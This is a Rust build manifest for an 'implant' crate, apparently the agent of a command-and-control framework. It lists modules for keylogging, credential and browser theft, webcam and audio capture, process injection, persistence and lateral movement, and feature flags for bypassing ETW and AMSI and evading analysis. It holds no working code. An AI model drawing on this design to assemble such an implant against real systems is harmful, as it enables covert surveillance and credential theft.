[package]
name = "implant-core"
version.workspace = true
edition.workspace = true

[[bin]]
name = "implant"
path = "src/main.rs"

[dependencies]
common = { path = "../common" }
crypto = { path = "../crypto" }
protocol = { path = "../protocol", default-features = false, features = ["grpc"] }
config = { path = "../config" }
tokio = { workspace = true, features = ["rt", "time", "sync", "process"] }
prost = { workspace = true }
uuid = { workspace = true }
chrono = { workspace = true }
tracing = { workspace = true }
tracing-subscriber = { version = "0.3", features = ["env-filter"] }
thiserror = { workspace = true }
serde_json = { workspace = true }
rand = "0.8"
lazy_static = "1.4"
base64 = "0.22"
hex = "0.4"
implant-loader = { path = "../implant-loader" }

[target.'cfg(unix)'.dependencies]
libc = "0.2"
ureq = { version = "2.9", default-features = false, features = ["tls"] }

[target.'cfg(windows)'.dependencies]
windows-sys = { version = "0.52", features = [
    "Win32_Foundation",
    "Win32_Networking_WinHttp",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_LibraryLoader",
    "Win32_System_Memory",
    "Win32_System_Threading",
    "Win32_Security_Cryptography",
    "Win32_System_SystemInformation",
    "Win32_System_WindowsProgramming",
    "Win32_NetworkManagement_IpHelper",
    "Win32_NetworkManagement_Ndis",
    "Win32_Networking_WinSock",
    "Win32_Security",
] }

# Runtime modules - all included by default
[dependencies.mod-file]
path = "../implant-modules/mod-file"

[dependencies.mod-shell]
path = "../implant-modules/mod-shell"

[dependencies.mod-bof]
path = "../implant-modules/mod-bof"

[dependencies.mod-mesh]
path = "../implant-modules/mod-mesh"

[dependencies.mesh]
path = "../mesh"

[dependencies.mod-inject]
path = "../implant-modules/mod-inject"

[dependencies.mod-token]
path = "../implant-modules/mod-token"

[dependencies.mod-socks]
path = "../implant-modules/mod-socks"

[dependencies.mod-screenshot]
path = "../implant-modules/mod-screenshot"

[dependencies.mod-env]
path = "../implant-modules/mod-env"

[dependencies.mod-keylog]
path = "../implant-modules/mod-keylog"

[dependencies.mod-clipboard]
path = "../implant-modules/mod-clipboard"

[dependencies.mod-reg]
path = "../implant-modules/mod-reg"

[dependencies.mod-svc]
path = "../implant-modules/mod-svc"

[dependencies.mod-persist]
path = "../implant-modules/mod-persist"

[dependencies.mod-scan]
path = "../implant-modules/mod-scan"

[dependencies.mod-lateral]
path = "../implant-modules/mod-lateral"

[dependencies.mod-creds]
path = "../implant-modules/mod-creds"

[dependencies.mod-browser]
path = "../implant-modules/mod-browser"

[dependencies.mod-audio]
path = "../implant-modules/mod-audio"

[dependencies.mod-webcam]
path = "../implant-modules/mod-webcam"

[dependencies.mod-usb]
path = "../implant-modules/mod-usb"

[dependencies.mod-rdp]
path = "../implant-modules/mod-rdp"

[dependencies.mod-proc]
path = "../implant-modules/mod-proc"

[dependencies.mod-ad]
path = "../implant-modules/mod-ad"

[features]
default = []
# Phase 4 OPSEC evasion features
evasion-sleep = []
evasion-stack = []
evasion-syscall = []
evasion-etw = []
evasion-amsi = []
anti-analysis = []

[dev-dependencies]
tokio-test = { workspace = true }
proptest = { workspace = true }
